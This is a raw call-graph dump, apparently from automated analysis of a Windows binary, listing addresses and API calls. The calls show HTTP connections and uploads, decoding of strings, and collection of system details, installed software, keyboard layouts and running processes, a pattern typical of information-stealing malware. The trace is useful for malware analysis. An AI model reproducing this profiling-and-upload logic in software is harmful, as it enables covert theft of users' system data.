14735->14736 14737 994a51 14736->14737 14738 9aa9b0 4 API calls 14737->14738 14739 994a7d 14738->14739 14740 9aa920 3 API calls 14739->14740 14741 994a84 14740->14741 14742 9aa8a0 lstrcpy 14741->14742 14743 994a8d 14742->14743 14744 994aa3 InternetConnectA 14743->14744 14744->14700 14745 994ad3 HttpOpenRequestA 14744->14745 14747 994b28 14745->14747 14748 994ebe InternetCloseHandle 14745->14748 14749 9aa9b0 4 API calls 14747->14749 14748->14700 14750 994b3c 14749->14750 14751 9aa8a0 lstrcpy 14750->14751 14752 994b45 14751->14752 14753 9aa920 3 API calls 14752->14753 14754 994b63 14753->14754 14755 9aa8a0 lstrcpy 14754->14755 14756 994b6c 14755->14756 14757 9aa9b0 4 API calls 14756->14757 14758 994b8b 14757->14758 14759 9aa8a0 lstrcpy 14758->14759 14760 994b94 14759->14760 14761 9aa9b0 4 API calls 14760->14761 14762 994bb5 14761->14762 14763 9aa8a0 lstrcpy 14762->14763 14764 994bbe 14763->14764 14765 9aa9b0 4 API calls 14764->14765 14766 994bde 14765->14766 14767 9aa8a0 lstrcpy 14766->14767 14768 994be7 14767->14768 14769 9aa9b0 4 API calls 14768->14769 14770 994c06 14769->14770 14771 9aa8a0 lstrcpy 14770->14771 14772 994c0f 14771->14772 14773 9aa920 3 API calls 14772->14773 14774 994c2d 14773->14774 14775 9aa8a0 lstrcpy 14774->14775 14776 994c36 14775->14776 14777 9aa9b0 4 API calls 14776->14777 14778 994c55 14777->14778 14779 9aa8a0 lstrcpy 14778->14779 14780 994c5e 14779->14780 14781 9aa9b0 4 API calls 14780->14781 14782 994c7d 14781->14782 14783 9aa8a0 lstrcpy 14782->14783 14784 994c86 14783->14784 14785 9aa920 3 API calls 14784->14785 14786 994ca4 14785->14786 14787 9aa8a0 lstrcpy 14786->14787 14788 994cad 14787->14788 14789 9aa9b0 4 API calls 14788->14789 14790 994ccc 14789->14790 14791 9aa8a0 lstrcpy 14790->14791 14792 994cd5 14791->14792 14793 9aa9b0 4 API calls 14792->14793 14794 994cf6 14793->14794 14795 9aa8a0 lstrcpy 14794->14795 14796 994cff 14795->14796 14797 9aa9b0 4 API calls 14796->14797 14798 994d1f 14797->14798 14799 9aa8a0 lstrcpy 14798->14799 14800 994d28 14799->14800 14801 9aa9b0 4 API calls 14800->14801 14802 994d47 14801->14802 14803 9aa8a0 lstrcpy 14802->14803 14804 994d50 14803->14804 14805 9aa920 3 API calls 14804->14805 14806 994d6e 14805->14806 14807 9aa8a0 lstrcpy 14806->14807 14808 994d77 14807->14808 14809 9aa740 lstrcpy 14808->14809 14810 994d92 14809->14810 14811 9aa920 3 API calls 14810->14811 14812 994db3 14811->14812 14813 9aa920 3 API calls 14812->14813 14814 994dba 14813->14814 14815 9aa8a0 lstrcpy 14814->14815 14816 994dc6 14815->14816 14817 994de7 lstrlen 14816->14817 14818 994dfa 14817->14818 14819 994e03 lstrlen 14818->14819 15756 9aaad0 14819->15756 14821 994e13 HttpSendRequestA 14822 994e32 InternetReadFile 14821->14822 14823 994e67 InternetCloseHandle 14822->14823 14828 994e5e 14822->14828 14826 9aa800 14823->14826 14825 9aa9b0 4 API calls 14825->14828 14826->14748 14827 9aa8a0 lstrcpy 14827->14828 14828->14822 14828->14823 14828->14825 14828->14827 15763 9aaad0 14829->15763 14831 9a17c4 StrCmpCA 14832 9a17cf ExitProcess 14831->14832 14841 9a17d7 14831->14841 14833 9a19c2 14833->13752 14834 9a187f StrCmpCA 14834->14841 14835 9a185d StrCmpCA 14835->14841 14836 9a1932 StrCmpCA 14836->14841 14837 9a1913 StrCmpCA 14837->14841 14838 9a1970 StrCmpCA 14838->14841 14839 9a18f1 StrCmpCA 14839->14841 14840 9a1951 StrCmpCA 14840->14841 14841->14833 14841->14834 14841->14835 14841->14836 14841->14837 14841->14838 14841->14839 14841->14840 14842 9a18cf StrCmpCA 14841->14842 14843 9a18ad StrCmpCA 14841->14843 14844 9aa820 lstrlen lstrcpy 14841->14844 14842->14841 14843->14841 14844->14841 14846 9aa7a0 lstrcpy 14845->14846 14847 995979 14846->14847 14848 9947b0 2 API calls 14847->14848 14849 995985 14848->14849 14850 9aa740 lstrcpy 14849->14850 14851 9959ba 14850->14851 14852 9aa740 lstrcpy 14851->14852 14853 9959c7 14852->14853 14854 9aa740 lstrcpy 14853->14854 14855 9959d4 14854->14855 14856 9aa740 lstrcpy 14855->14856 14857 9959e1 14856->14857 14858 9aa740 lstrcpy 14857->14858 14859 9959ee InternetOpenA StrCmpCA 14858->14859 14860 995a1d 14859->14860 14861 995fc3 InternetCloseHandle 14860->14861 14862 9a8b60 3 API calls 14860->14862 14863 995fe0 14861->14863 14864 995a3c 14862->14864 14866 999ac0 4 API calls 14863->14866 14865 9aa920 3 API calls 14864->14865 14867 995a4f 14865->14867 14868 995fe6 14866->14868 14869 9aa8a0 lstrcpy 14867->14869 14870 9aa820 2 API calls 14868->14870 14872 99601f ctype 14868->14872 14874 995a58 14869->14874 14871 995ffd 14870->14871 14873 9aa9b0 4 API calls 14871->14873 14876 9aa7a0 lstrcpy 14872->14876 14875 996013 14873->14875 14878 9aa9b0 4 API calls 14874->14878 14877 9aa8a0 lstrcpy 14875->14877 14886 99604f 14876->14886 14877->14872 14879 995a82 14878->14879 14880 9aa8a0 lstrcpy 14879->14880 14881 995a8b 14880->14881 14882 9aa9b0 4 API calls 14881->14882 14883 995aaa 14882->14883 14884 9aa8a0 lstrcpy 14883->14884 14885 995ab3 14884->14885 14887 9aa920 3 API calls 14885->14887 14886->13758 14888 995ad1 14887->14888 14889 9aa8a0 lstrcpy 14888->14889 14890 995ada 14889->14890 14891 9aa9b0 4 API calls 14890->14891 14892 995af9 14891->14892 14893 9aa8a0 lstrcpy 14892->14893 14894 995b02 14893->14894 14895 9aa9b0 4 API calls 14894->14895 14896 995b21 14895->14896 14897 9aa8a0 lstrcpy 14896->14897 14898 995b2a 14897->14898 14899 9aa9b0 4 API calls 14898->14899 14900 995b56 14899->14900 14901 9aa920 3 API calls 14900->14901 14902 995b5d 14901->14902 14903 9aa8a0 lstrcpy 14902->14903 14904 995b66 14903->14904 14905 995b7c InternetConnectA 14904->14905 14905->14861 14906 995bac HttpOpenRequestA 14905->14906 14908 995c0b 14906->14908 14909 995fb6 InternetCloseHandle 14906->14909 14910 9aa9b0 4 API calls 14908->14910 14909->14861 14911 995c1f 14910->14911 14912 9aa8a0 lstrcpy 14911->14912 14913 995c28 14912->14913 14914 9aa920 3 API calls 14913->14914 14915 995c46 14914->14915 14916 9aa8a0 lstrcpy 14915->14916 14917 995c4f 14916->14917 14918 9aa9b0 4 API calls 14917->14918 14919 995c6e 14918->14919 14920 9aa8a0 lstrcpy 14919->14920 14921 995c77 14920->14921 14922 9aa9b0 4 API calls 14921->14922 14923 995c98 14922->14923 14924 9aa8a0 lstrcpy 14923->14924 14925 995ca1 14924->14925 14926 9aa9b0 4 API calls 14925->14926 14927 995cc1 14926->14927 14928 9aa8a0 lstrcpy 14927->14928 14929 995cca 14928->14929 14930 9aa9b0 4 API calls 14929->14930 14931 995ce9 14930->14931 14932 9aa8a0 lstrcpy 14931->14932 14933 995cf2 14932->14933 14934 9aa920 3 API calls 14933->14934 14935 995d10 14934->14935 14936 9aa8a0 lstrcpy 14935->14936 14937 995d19 14936->14937 14938 9aa9b0 4 API calls 14937->14938 14939 995d38 14938->14939 14940 9aa8a0 lstrcpy 14939->14940 14941 995d41 14940->14941 14942 9aa9b0 4 API calls 14941->14942 14943 995d60 14942->14943 14944 9aa8a0 lstrcpy 14943->14944 14945 995d69 14944->14945 14946 9aa920 3 API calls 14945->14946 14947 995d87 14946->14947 14948 9aa8a0 lstrcpy 14947->14948 14949 995d90 14948->14949 14950 9aa9b0 4 API calls 14949->14950 14951 995daf 14950->14951 14952 9aa8a0 lstrcpy 14951->14952 14953 995db8 14952->14953 14954 9aa9b0 4 API calls 14953->14954 14955 995dd9 14954->14955 14956 9aa8a0 lstrcpy 14955->14956 14957 995de2 14956->14957 14958 9aa9b0 4 API calls 14957->14958 14959 995e02 14958->14959 14960 9aa8a0 lstrcpy 14959->14960 14961 995e0b 14960->14961 14962 9aa9b0 4 API calls 14961->14962 14963 995e2a 14962->14963 14964 9aa8a0 lstrcpy 14963->14964 14965 995e33 14964->14965 14966 9aa920 3 API calls 14965->14966 14967 995e54 14966->14967 14968 9aa8a0 lstrcpy 14967->14968 14969 995e5d 14968->14969 14970 995e70 lstrlen 14969->14970 15764 9aaad0 14970->15764 14972 995e81 lstrlen GetProcessHeap RtlAllocateHeap 15765 9aaad0 14972->15765 14974 995eae lstrlen 14975 995ebe 14974->14975 14976 995ed7 lstrlen 14975->14976 14977 995ee7 14976->14977 14978 995ef0 lstrlen 14977->14978 14979 995f04 14978->14979 14980 995f1a lstrlen 14979->14980 15766 9aaad0 14980->15766 14982 995f2a HttpSendRequestA 14983 995f35 InternetReadFile 14982->14983 14984 995f6a InternetCloseHandle 14983->14984 14988 995f61 14983->14988 14984->14909 14986 9aa9b0 4 API calls 14986->14988 14987 9aa8a0 lstrcpy 14987->14988 14988->14983 14988->14984 14988->14986 14988->14987 14991 9a1077 14989->14991 14990 9a1151 14990->13760 14991->14990 14992 9aa820 lstrlen lstrcpy 14991->14992 14992->14991 14995 9a0db7 14993->14995 14994 9a0f17 14994->13768 14995->14994 14996 9a0e27 StrCmpCA 14995->14996 14997 9a0e67 StrCmpCA 14995->14997 14998 9a0ea4 StrCmpCA 14995->14998 14999 9aa820 lstrlen lstrcpy 14995->14999 14996->14995 14997->14995 14998->14995 14999->14995 15001 9a0f67 15000->15001 15002 9a1044 15001->15002 15003 9a0fb2 StrCmpCA 15001->15003 15004 9aa820 lstrlen lstrcpy 15001->15004 15002->13776 15003->15001 15004->15001 15006 9aa740 lstrcpy 15005->15006 15007 9a1a26 15006->15007 15008 9aa9b0 4 API calls 15007->15008 15009 9a1a37 15008->15009 15010 9aa8a0 lstrcpy 15009->15010 15011 9a1a40 15010->15011 15012 9aa9b0 4 API calls 15011->15012 15013 9a1a5b 15012->15013 15014 9aa8a0 lstrcpy 15013->15014 15015 9a1a64 15014->15015 15016 9aa9b0 4 API calls 15015->15016 15017 9a1a7d 15016->15017 15018 9aa8a0 lstrcpy 15017->15018 15019 9a1a86 15018->15019 15020 9aa9b0 4 API calls 15019->15020 15021 9a1aa1 15020->15021 15022 9aa8a0 lstrcpy 15021->15022 15023 9a1aaa 15022->15023 15024 9aa9b0 4 API calls 15023->15024 15025 9a1ac3 15024->15025 15026 9aa8a0 lstrcpy 15025->15026 15027 9a1acc 15026->15027 15028 9aa9b0 4 API calls 15027->15028 15029 9a1ae7 15028->15029 15030 9aa8a0 lstrcpy 15029->15030 15031 9a1af0 15030->15031 15032 9aa9b0 4 API calls 15031->15032 15033 9a1b09 15032->15033 15034 9aa8a0 lstrcpy 15033->15034 15035 9a1b12 15034->15035 15036 9aa9b0 4 API calls 15035->15036 15037 9a1b2d 15036->15037 15038 9aa8a0 lstrcpy 15037->15038 15039 9a1b36 15038->15039 15040 9aa9b0 4 API calls 15039->15040 15041 9a1b4f 15040->15041 15042 9aa8a0 lstrcpy 15041->15042 15043 9a1b58 15042->15043 15044 9aa9b0 4 API calls 15043->15044 15045 9a1b76 15044->15045 15046 9aa8a0 lstrcpy 15045->15046 15047 9a1b7f 15046->15047 15048 9a7500 6 API calls 15047->15048 15049 9a1b96 15048->15049 15050 9aa920 3 API calls 15049->15050 15051 9a1ba9 15050->15051 15052 9aa8a0 lstrcpy 15051->15052 15053 9a1bb2 15052->15053 15054 9aa9b0 4 API calls 15053->15054 15055 9a1bdc 15054->15055 15056 9aa8a0 lstrcpy 15055->15056 15057 9a1be5 15056->15057 15058 9aa9b0 4 API calls 15057->15058 15059 9a1c05 15058->15059 15060 9aa8a0 lstrcpy 15059->15060 15061 9a1c0e 15060->15061 15767 9a7690 GetProcessHeap RtlAllocateHeap 15061->15767 15064 9aa9b0 4 API calls 15065 9a1c2e 15064->15065 15066 9aa8a0 lstrcpy 15065->15066 15067 9a1c37 15066->15067 15068 9aa9b0 4 API calls 15067->15068 15069 9a1c56 15068->15069 15070 9aa8a0 lstrcpy 15069->15070 15071 9a1c5f 15070->15071 15072 9aa9b0 4 API calls 15071->15072 15073 9a1c80 15072->15073 15074 9aa8a0 lstrcpy 15073->15074 15075 9a1c89 15074->15075 15774 9a77c0 GetCurrentProcess IsWow64Process 15075->15774 15078 9aa9b0 4 API calls 15079 9a1ca9 15078->15079 15080 9aa8a0 lstrcpy 15079->15080 15081 9a1cb2 15080->15081 15082 9aa9b0 4 API calls 15081->15082 15083 9a1cd1 15082->15083 15084 9aa8a0 lstrcpy 15083->15084 15085 9a1cda 15084->15085 15086 9aa9b0 4 API calls 15085->15086 15087 9a1cfb 15086->15087 15088 9aa8a0 lstrcpy 15087->15088 15089 9a1d04 15088->15089 15090 9a7850 3 API calls 15089->15090 15091 9a1d14 15090->15091 15092 9aa9b0 4 API calls 15091->15092 15093 9a1d24 15092->15093 15094 9aa8a0 lstrcpy 15093->15094 15095 9a1d2d 15094->15095 15096 9aa9b0 4 API calls 15095->15096 15097 9a1d4c 15096->15097 15098 9aa8a0 lstrcpy 15097->15098 15099 9a1d55 15098->15099 15100 9aa9b0 4 API calls 15099->15100 15101 9a1d75 15100->15101 15102 9aa8a0 lstrcpy 15101->15102 15103 9a1d7e 15102->15103 15104 9a78e0 3 API calls 15103->15104 15105 9a1d8e 15104->15105 15106 9aa9b0 4 API calls 15105->15106 15107 9a1d9e 15106->15107 15108 9aa8a0 lstrcpy 15107->15108 15109 9a1da7 15108->15109 15110 9aa9b0 4 API calls 15109->15110 15111 9a1dc6 15110->15111 15112 9aa8a0 lstrcpy 15111->15112 15113 9a1dcf 15112->15113 15114 9aa9b0 4 API calls 15113->15114 15115 9a1df0 15114->15115 15116 9aa8a0 lstrcpy 15115->15116 15117 9a1df9 15116->15117 15776 9a7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15117->15776 15120 9aa9b0 4 API calls 15121 9a1e19 15120->15121 15122 9aa8a0 lstrcpy 15121->15122 15123 9a1e22 15122->15123 15124 9aa9b0 4 API calls 15123->15124 15125 9a1e41 15124->15125 15126 9aa8a0 lstrcpy 15125->15126 15127 9a1e4a 15126->15127 15128 9aa9b0 4 API calls 15127->15128 15129 9a1e6b 15128->15129 15130 9aa8a0 lstrcpy 15129->15130 15131 9a1e74 15130->15131 15778 9a7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15131->15778 15134 9aa9b0 4 API calls 15135 9a1e94 15134->15135 15136 9aa8a0 lstrcpy 15135->15136 15137 9a1e9d 15136->15137 15138 9aa9b0 4 API calls 15137->15138 15139 9a1ebc 15138->15139 15140 9aa8a0 lstrcpy 15139->15140 15141 9a1ec5 15140->15141 15142 9aa9b0 4 API calls 15141->15142 15143 9a1ee5 15142->15143 15144 9aa8a0 lstrcpy 15143->15144 15145 9a1eee 15144->15145 15781 9a7b00 GetUserDefaultLocaleName 15145->15781 15148 9aa9b0 4 API calls 15149 9a1f0e 15148->15149 15150 9aa8a0 lstrcpy 15149->15150 15151 9a1f17 15150->15151 15152 9aa9b0 4 API calls 15151->15152 15153 9a1f36 15152->15153 15154 9aa8a0 lstrcpy 15153->15154 15155 9a1f3f 15154->15155 15156 9aa9b0 4 API calls 15155->15156 15157 9a1f60 15156->15157 15158 9aa8a0 lstrcpy 15157->15158 15159 9a1f69 15158->15159 15785 9a7b90 15159->15785 15161 9a1f80 15162 9aa920 3 API calls 15161->15162 15163 9a1f93 15162->15163 15164 9aa8a0 lstrcpy 15163->15164 15165 9a1f9c 15164->15165 15166 9aa9b0 4 API calls 15165->15166 15167 9a1fc6 15166->15167 15168 9aa8a0 lstrcpy 15167->15168 15169 9a1fcf 15168->15169 15170 9aa9b0 4 API calls 15169->15170 15171 9a1fef 15170->15171 15172 9aa8a0 lstrcpy 15171->15172 15173 9a1ff8 15172->15173 15797 9a7d80 GetSystemPowerStatus 15173->15797 15176 9aa9b0 4 API calls 15177 9a2018 15176->15177 15178 9aa8a0 lstrcpy 15177->15178 15179 9a2021 15178->15179 15180 9aa9b0 4 API calls 15179->15180 15181 9a2040 15180->15181 15182 9aa8a0 lstrcpy 15181->15182 15183 9a2049 15182->15183 15184 9aa9b0 4 API calls 15183->15184 15185 9a206a 15184->15185 15186 9aa8a0 lstrcpy 15185->15186 15187 9a2073 15186->15187 15188 9a207e GetCurrentProcessId 15187->15188 15799 9a9470 OpenProcess 15188->15799 15191 9aa920 3 API calls 15192 9a20a4 15191->15192 15193 9aa8a0 lstrcpy 15192->15193 15194 9a20ad 15193->15194 15195 9aa9b0 4 API calls 15194->15195 15196 9a20d7 15195->15196 15197 9aa8a0 lstrcpy 15196->15197 15198 9a20e0 15197->15198 15199 9aa9b0 4 API calls 15198->15199 15200 9a2100 15199->15200 15201 9aa8a0 lstrcpy 15200->15201 15202 9a2109 15201->15202 15804 9a7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15202->15804 15205 9aa9b0 4 API calls 15206 9a2129 15205->15206 15207 9aa8a0 lstrcpy 15206->15207 15208 9a2132 15207->15208 15209 9aa9b0 4 API calls 15208->15209 15210 9a2151 15209->15210 15211 9aa8a0 lstrcpy 15210->15211 15212 9a215a 15211->15212 15213 9aa9b0 4 API calls 15212->15213 15214 9a217b 15213->15214 15215 9aa8a0 lstrcpy 15214->15215 15216 9a2184 15215->15216 15808 9a7f60 15216->15808 15219 9aa9b0 4 API calls 15220 9a21a4 15219->15220 15221 9aa8a0 lstrcpy 15220->15221 15222 9a21ad 15221->15222 15223 9aa9b0 4 API calls 15222->15223 15224 9a21cc 15223->15224 15225 9aa8a0 lstrcpy 15224->15225 15226 9a21d5 15225->15226 15227 9aa9b0 4 API calls 15226->15227 15228 9a21f6 15227->15228 15229 9aa8a0 lstrcpy 15228->15229 15230 9a21ff 15229->15230 15821 9a7ed0 GetSystemInfo wsprintfA 15230->15821 15233 9aa9b0 4 API calls 15234 9a221f 15233->15234 15235 9aa8a0 lstrcpy 15234->15235 15236 9a2228 15235->15236 15237 9aa9b0 4 API calls 15236->15237 15238 9a2247 15237->15238 15239 9aa8a0 lstrcpy 15238->15239 15240 9a2250 15239->15240 15241 9aa9b0 4 API calls 15240->15241 15242 9a2270 15241->15242 15243 9aa8a0 lstrcpy 15242->15243 15244 9a2279 15243->15244 15823 9a8100 GetProcessHeap RtlAllocateHeap 15244->15823 15247 9aa9b0 4 API calls 15248 9a2299 15247->15248 15249 9aa8a0 lstrcpy 15248->15249 15250 9a22a2 15249->15250 15251 9aa9b0 4 API calls 15250->15251 15252 9a22c1 15251->15252 15253 9aa8a0 lstrcpy 15252->15253 15254 9a22ca 15253->15254 15255 9aa9b0 4 API calls 15254->15255 15256 9a22eb 15255->15256 15257 9aa8a0 lstrcpy 15256->15257 15258 9a22f4 15257->15258 15829 9a87c0 15258->15829 15261 9aa920 3 API calls 15262 9a231e 15261->15262 15263 9aa8a0 lstrcpy 15262->15263 15264 9a2327 15263->15264 15265 9aa9b0 4 API calls 15264->15265 15266 9a2351 15265->15266 15267 9aa8a0 lstrcpy 15266->15267 15268 9a235a 15267->15268 15269 9aa9b0 4 API calls 15268->15269 15270 9a237a 15269->15270 15271 9aa8a0 lstrcpy 15270->15271 15272 9a2383 15271->15272 15273 9aa9b0 4 API calls 15272->15273 15274 9a23a2 15273->15274 15275 9aa8a0 lstrcpy 15274->15275 15276 9a23ab 15275->15276 15834 9a81f0 15276->15834 15278 9a23c2 15279 9aa920 3 API calls 15278->15279 15280 9a23d5 15279->15280 15281 9aa8a0 lstrcpy 15280->15281 15282 9a23de 15281->15282 15283 9aa9b0 4 API calls 15282->15283 15284 9a240a 15283->15284 15285 9aa8a0 lstrcpy 15284->15285 15286 9a2413 15285->15286 15287 9aa9b0 4 API calls 15286->15287 15288 9a2432 15287->15288 15289 9aa8a0 lstrcpy 15288->15289 15290 9a243b 15289->15290 15291 9aa9b0 4 API calls 15290->15291 15292 9a245c 15291->15292 15293 9aa8a0 lstrcpy 15292->15293 15294 9a2465 15293->15294 15295 9aa9b0 4 API calls 15294->15295 15296 9a2484 15295->15296 15297 9aa8a0 lstrcpy 15296->15297 15298 9a248d 15297->15298 15299 9aa9b0 4 API calls 15298->15299 15300 9a24ae 15299->15300 15301 9aa8a0 lstrcpy 15300->15301 15302 9a24b7 15301->15302 15842 9a8320 15302->15842 15304 9a24d3 15305 9aa920 3 API calls 15304->15305 15306 9a24e6 15305->15306 15307 9aa8a0 lstrcpy 15306->15307 15308 9a24ef 15307->15308 15309 9aa9b0 4 API calls 15308->15309 15310 9a2519 15309->15310 15311 9aa8a0 lstrcpy 15310->15311 15312 9a2522 15311->15312 15313 9aa9b0 4 API calls 15312->15313 15314 9a2543 15313->15314 15315 9aa8a0 lstrcpy 15314->15315 15316 9a254c 15315->15316 15317 9a8320 17 API calls 15316->15317 15318 9a2568 15317->15318 15319 9aa920 3 API calls 15318->15319 15320 9a257b 15319->15320 15321 9aa8a0 lstrcpy 15320->15321 15322 9a2584 15321->15322 15323 9aa9b0 4 API calls 15322->15323 15324 9a25ae 15323->15324 15325 9aa8a0 lstrcpy 15324->15325 15326 9a25b7 15325->15326 15327 9aa9b0 4 API calls 15326->15327 15328 9a25d6 15327->15328 15329 9aa8a0 lstrcpy 15328->15329 15330 9a25df 15329->15330 15331 9aa9b0 4 API calls 15330->15331 15332 9a2600 15331->15332 15333 9aa8a0 lstrcpy 15332->15333 15334 9a2609 15333->15334 15878 9a8680 15334->15878 15336 9a2620 15337 9aa920 3 API calls 15336->15337 15338 9a2633 15337->15338 15339 9aa8a0 lstrcpy 15338->15339 15340 9a263c 15339->15340 15341 9a265a lstrlen 15340->15341 15342 9a266a 15341->15342 15343 9aa740 lstrcpy 15342->15343 15344 9a267c 15343->15344 15345 991590 lstrcpy 15344->15345 15346 9a268d 15345->15346 15888 9a5190 15346->15888 15348 9a2699 15348->13780 16076 9aaad0 15349->16076 15351 995009 InternetOpenUrlA 15355 995021 15351->15355 15352 99502a InternetReadFile 15352->15355 15353 9950a0 InternetCloseHandle InternetCloseHandle 15354 9950ec 15353->15354 15354->13784 15355->15352 15355->15353 16077 9998d0 15356->16077 15358 9a0759 15359 9a0a38 15358->15359 15360 9a077d 15358->15360 15361 991590 lstrcpy 15359->15361 15363 9a0799 StrCmpCA 15360->15363 15362 9a0a49 15361->15362 16253 9a0250 15362->16253 15365 9a07a8 15363->15365 15390 9a0843 15363->15390 15367 9aa7a0 lstrcpy 15365->15367 15369 9a07c3 15367->15369 15368 9a0865 StrCmpCA 15370 9a0874 15368->15370 15408 9a096b 15368->15408 15371 991590 lstrcpy 15369->15371 15372 9aa740 lstrcpy 15370->15372 15373 9a080c 15371->15373 15375 9a0881 15372->15375 15376 9aa7a0 lstrcpy 15373->15376 15374 9a099c StrCmpCA 15378 9a09ab 15374->15378 15379 9a0a2d 15374->15379 15380 9aa9b0 4 API calls 15375->15380 15377 9a0823 15376->15377 15381 9aa7a0 lstrcpy 15377->15381 15382 991590 lstrcpy 15378->15382 15379->13788 15383 9a08ac 15380->15383 15384 9a083e 15381->15384 15385 9a09f4 15382->15385 15386 9aa920 3 API calls 15383->15386 16080 99fb00 15384->16080 15388 9aa7a0 lstrcpy 15385->15388 15389 9a08b3 15386->15389 15391 9a0a0d 15388->15391 15392 9aa9b0 4 API calls 15389->15392 15390->15368 15394 9aa7a0 lstrcpy 15391->15394 15393 9a08ba 15392->15393 15395 9aa8a0 lstrcpy 15393->15395 15396 9a0a28 15394->15396 15408->15374 15728 9aa7a0 lstrcpy 15727->15728 15729 991683 15728->15729 15730 9aa7a0 lstrcpy 15729->15730 15731 991695 15730->15731 15732 9aa7a0 lstrcpy 15731->15732 15733 9916a7 15732->15733 15734 9aa7a0 lstrcpy 15733->15734 15735 9915a3 15734->15735 15735->14611 15737 9947c6 15736->15737 15738 994838 lstrlen 15737->15738 15762 9aaad0 15738->15762 15740 994848 InternetCrackUrlA 15741 994867 15740->15741 15741->14688 15743 9aa740 lstrcpy 15742->15743 15744 9a8b74 15743->15744 15745 9aa740 lstrcpy 15744->15745 15746 9a8b82 GetSystemTime 15745->15746 15748 9a8b99 15746->15748 15747 9aa7a0 lstrcpy 15749 9a8bfc 15747->15749 15748->15747 15749->14703 15751 9aa931 15750->15751 15752 9aa988 15751->15752 15754 9aa968 lstrcpy lstrcat 15751->15754 15753 9aa7a0 lstrcpy 15752->15753 15755 9aa994 15753->15755 15754->15752 15755->14706 15756->14821 15758 999af9 LocalAlloc 15757->15758 15759 994eee 15757->15759 15758->15759 15760 999b14 CryptStringToBinaryA 15758->15760 15759->14709 15759->14712 15760->15759 15761 999b39 LocalFree 15760->15761 15761->15759 15762->15740 15763->14831 15764->14972 15765->14974 15766->14982 15895 9a77a0 15767->15895 15770 9a1c1e 15770->15064 15771 9a76c6 RegOpenKeyExA 15772 9a76e7 RegQueryValueExA 15771->15772 15773 9a7704 RegCloseKey 15771->15773 15772->15773 15773->15770 15775 9a1c99 15774->15775 15775->15078 15777 9a1e09 15776->15777 15777->15120 15779 9a7a9a wsprintfA 15778->15779 15780 9a1e84 15778->15780 15779->15780 15780->15134 15782 9a7b4d 15781->15782 15783 9a1efe 15781->15783 15902 9a8d20 LocalAlloc CharToOemW 15782->15902 15783->15148 15786 9aa740 lstrcpy 15785->15786 15787 9a7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15786->15787 15796 9a7c25 15787->15796 15788 9a7d18 15790 9a7d28 15788->15790 15791 9a7d1e LocalFree 15788->15791 15789 9a7c46 GetLocaleInfoA 15789->15796 15792 9aa7a0 lstrcpy 15790->15792 15791->15790 15795 9a7d37 15792->15795 15793 9aa9b0 lstrcpy lstrlen lstrcpy lstrcat 15793->15796 15794 9aa8a0 lstrcpy 15794->15796 15795->15161 15796->15788 15796->15789 15796->15793 15796->15794 15798 9a2008 15797->15798 15798->15176 15800 9a9493 GetModuleFileNameExA CloseHandle 15799->15800 15801 9a94b5 15799->15801 15800->15801 15802 9aa740 lstrcpy 15801->15802 15803 9a2091 15802->15803 15803->15191 15805 9a7e68 RegQueryValueExA 15804->15805 15806 9a2119 15804->15806 15807 9a7e8e RegCloseKey 15805->15807 15806->15205 15807->15806 15809 9a7fb9 GetLogicalProcessorInformationEx 15808->15809 15810 9a7fd8 GetLastError 15809->15810 15812 9a8029 15809->15812 15811 9a7fe3 15810->15811 15819 9a8022 15810->15819 15811->15809 15818 9a2194 15811->15818 15903 9a89f0 15811->15903 15906 9a8a10 GetProcessHeap RtlAllocateHeap 15811->15906 15816 9a89f0 2 API calls 15812->15816 15815 9a89f0 2 API calls 15815->15818 15817 9a807b 15816->15817 15817->15819 15820 9a8084 wsprintfA 15817->15820 15818->15219 15819->15815 15819->15818 15820->15818 15822 9a220f 15821->15822 15822->15233 15824 9a89b0 15823->15824 15825 9a814d GlobalMemoryStatusEx 15824->15825 15826 9a8163 __aulldiv 15825->15826 15827 9a819b wsprintfA 15826->15827 15828 9a2289 15827->15828 15828->15247 15830 9a87fb GetProcessHeap RtlAllocateHeap wsprintfA 15829->15830 15832 9aa740 lstrcpy 15830->15832 15833 9a230b 15832->15833 15833->15261 15835 9aa740 lstrcpy 15834->15835 15839 9a8229 15835->15839 15836 9a8263 15838 9aa7a0 lstrcpy 15836->15838 15837 9aa9b0 lstrcpy lstrlen lstrcpy lstrcat 15837->15839 15840 9a82dc 15838->15840 15839->15836 15839->15837 15841 9aa8a0 lstrcpy 15839->15841 15840->15278 15841->15839 15843 9aa740 lstrcpy 15842->15843 15844 9a835c RegOpenKeyExA 15843->15844 15845 9a83ae 15844->15845 15846 9a83d0 15844->15846 15847 9aa7a0 lstrcpy 15845->15847 15848 9a83f8 RegEnumKeyExA 15846->15848 15849 9a8613 RegCloseKey 15846->15849 15859 9a83bd 15847->15859 15851 9a860e 15848->15851 15852 9a843f wsprintfA RegOpenKeyExA 15848->15852 15850 9aa7a0 lstrcpy 15849->15850 15850->15859 15851->15849 15853 9a84c1 RegQueryValueExA 15852->15853 15854 9a8485 RegCloseKey RegCloseKey 15852->15854 15855 9a84fa lstrlen 15853->15855 15856 9a8601 RegCloseKey 15853->15856 15857 9aa7a0 lstrcpy 15854->15857 15855->15856 15858 9a8510 15855->15858 15856->15851 15857->15859 15860 9aa9b0 4 API calls 15858->15860 15859->15304 15861 9a8527 15860->15861 15862 9aa8a0 lstrcpy 15861->15862 15863 9a8533 15862->15863 15864 9aa9b0 4 API calls 15863->15864 15865 9a8557 15864->15865 15866 9aa8a0 lstrcpy 15865->15866 15867 9a8563 15866->15867 15868 9a856e RegQueryValueExA 15867->15868 15868->15856 15869 9a85a3 15868->15869 15870 9aa9b0 4 API calls 15869->15870 15871 9a85ba 15870->15871 15872 9aa8a0 lstrcpy 15871->15872 15873 9a85c6 15872->15873 15874 9aa9b0 4 API calls 15873->15874 15875 9a85ea 15874->15875 15876 9aa8a0 lstrcpy 15875->15876 15877 9a85f6 15876->15877 15877->15856 15879 9aa740 lstrcpy 15878->15879 15880 9a86bc CreateToolhelp32Snapshot Process32First 15879->15880 15881 9a86e8 Process32Next 15880->15881 15882 9a875d CloseHandle 15880->15882 15881->15882 15887 9a86fd 15881->15887 15883 9aa7a0 lstrcpy 15882->15883 15886 9a8776 15883->15886 15884 9aa9b0 lstrcpy lstrlen lstrcpy lstrcat 15884->15887 15885 9aa8a0 lstrcpy 15885->15887 15886->15336 15887->15881 15887->15884 15887->15885 15889 9aa7a0 lstrcpy 15888->15889 15890 9a51b5 15889->15890 15891 991590 lstrcpy 15890->15891 15892 9a51c6 15891->15892 15907 995100 15892->15907 15894 